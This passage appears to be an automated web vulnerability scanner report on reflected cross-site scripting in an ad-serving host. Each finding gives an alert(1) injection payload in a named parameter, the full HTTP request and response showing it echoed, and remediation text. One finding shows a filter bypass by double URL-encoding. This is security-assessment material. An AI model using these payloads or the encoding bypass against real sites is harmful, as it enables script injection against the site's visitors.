GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:02 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:38345:1296398942:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:02 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 847
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf10'-alert(1)-'1127fd83b50 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/ Set-Cookie: i_1=33:353:811:3:0:38345:1296399014:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d94a'-alert(1)-'4c886f70b75 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:32 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:38345:1296399032:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:32 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 847
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef261'-alert(1)-'59d2a35347c was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:38345:1296399023:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 841
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6bc'-alert(1)-'9bf2b8ea5fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:00 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:38345:1296399000:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:00 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 847
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0675'-alert(1)-'1d0a1b63990 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:41 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:38345:1296398981:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:41 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 852
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
5.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8f8c'-alert(1)-'f1bcb22b6f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:13 GMT; path=/ Set-Cookie: i_1=33:353:23:3:0:38345:1296399073:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:51:13 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec90"-alert(1)-"90ddf5ba23f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639dec90"-alert(1)-"90ddf5ba23f&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf2d"-alert(1)-"7ab97a50287 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061259cf2d"-alert(1)-"7ab97a50287&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b596a"-alert(1)-"06aa7f69f1c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8b596a"-alert(1)-"06aa7f69f1c HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e350c"-alert(1)-"866fa489770 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQe350c"-alert(1)-"866fa489770&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2726b%2522%253balert%25281%2529%252f%252fe9adb046056 was submitted in the REST URL parameter 2. This input was echoed as 2726b";alert(1)//e9adb046056 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313572726b%2522%253balert%25281%2529%252f%252fe9adb046056/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:43:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c2a%2522%253balert%25281%2529%252f%252f53353438aff was submitted in the REST URL parameter 3. This input was echoed as 34c2a";alert(1)//53353438aff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3034c2a%2522%253balert%25281%2529%252f%252f53353438aff/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:43:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa01b"-alert(1)-"1b5b12782c4 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
